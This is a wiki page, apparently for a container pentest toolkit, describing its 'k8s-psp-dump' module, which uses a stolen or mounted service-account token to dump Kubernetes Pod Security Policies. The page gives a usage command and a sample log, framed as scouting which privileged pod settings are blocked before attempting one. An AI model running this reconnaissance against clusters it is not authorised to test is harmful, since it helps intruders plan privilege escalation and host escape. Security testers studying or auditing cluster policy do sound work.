Exploit: k8s psp dump
neargle edited this page Mar 24, 2021 · 1 revision
When you already hold a kubeconfig or a service-account token and want to create a specially configured pod (host namespaces, hostPath mounts, extra capabilities), but the cluster's Pod Security Policies reject it, this exploit dumps the PodSecurityPolicy objects so you can see which settings the policies forbid before you try.

Requirements and caveats:

- The identity you use must be allowed to `list` `podsecuritypolicies` in the `policy` API group. The request is a plain GET to `/apis/policy/v1beta1/podsecuritypolicies`; a service account without that RBAC grant receives a 403 and nothing is dumped.
- With `auto`, the tool uses the service-account token mounted in the current pod and takes the API server address from the in-cluster environment variables; otherwise pass the path of a token file.
- PSPs are only enforced when the PodSecurityPolicy admission controller is enabled, and a pod is admitted if any one policy that the creating user or service account is granted (RBAC verb `use`) accepts the whole pod spec. The dump shows every policy the identity can list, not which one applies to it, so a setting that is not reported as disallowed may still be blocked for you.
- PSP was deprecated in Kubernetes 1.21 and removed in 1.25 together with the `policy/v1beta1` podsecuritypolicies endpoint. On 1.25+ clusters the request returns 404 and the equivalent restriction comes from Pod Security Admission, configured through the `pod-security.kubernetes.io/enforce` label on each namespace.
Usage:

```
./cdk run k8s-psp-dump (auto|<service-account-token-path>)
```

Example run from inside a pod, using the mounted service-account token:

```
./cdk run k8s-psp-dump auto
2021/03/24 22:15:58 getting K8s api-server API addr.
Find K8s api-server in ENV: https://ip:8443
2021/03/24 22:15:58 trying to dump K8s Pod Security Policies with local service-account: token
2021/03/24 22:15:58 requesting /apis/policy/v1beta1/podsecuritypolicies
2021/03/24 22:15:58 dump Pod Security Policies success, saved in: k8s_pod_security_policies.json
2021/03/24 22:15:58 requesting /api/v1/namespaces/default/pods
2021/03/24 22:15:58 K8S Pod Security Policies rule list:
2021/03/24 22:15:58 rule { securityContext.hostPID: true } is not allowed.
2021/03/24 22:15:58 rule { securityContext.hostIPC: true } is not allowed.
2021/03/24 22:15:58 rule { volumes[0].hostPath.pathPrefix: \"/proc\" } is not allowed.
2021/03/24 22:15:58 rule { volumes[1].hostPath.pathPrefix: \"/dev\" } is not allowed.
2021/03/24 22:15:58 rule { volumes[2].hostPath.pathPrefix: \"/sys\" } is not allowed.
2021/03/24 22:15:58 rule { volumes[3].hostPath.pathPrefix: \"/\" } is not allowed.
2021/03/24 22:15:58 rule { containers[0].securityContext.capabilities.add: \"SYS_ADMIN\" } is not allowed.
2021/03/24 22:15:58 rule { containers[0].securityContext.capabilities.add: \"SYS_PTRACE\" } is not allowed.
```

Each reported rule is a pod-spec setting that none of the dumped policies permits. The full policy objects are in the saved `k8s_pod_security_policies.json`, which is what to read when you need the exact allowed host-path prefixes, volume types or capabilities rather than the summary.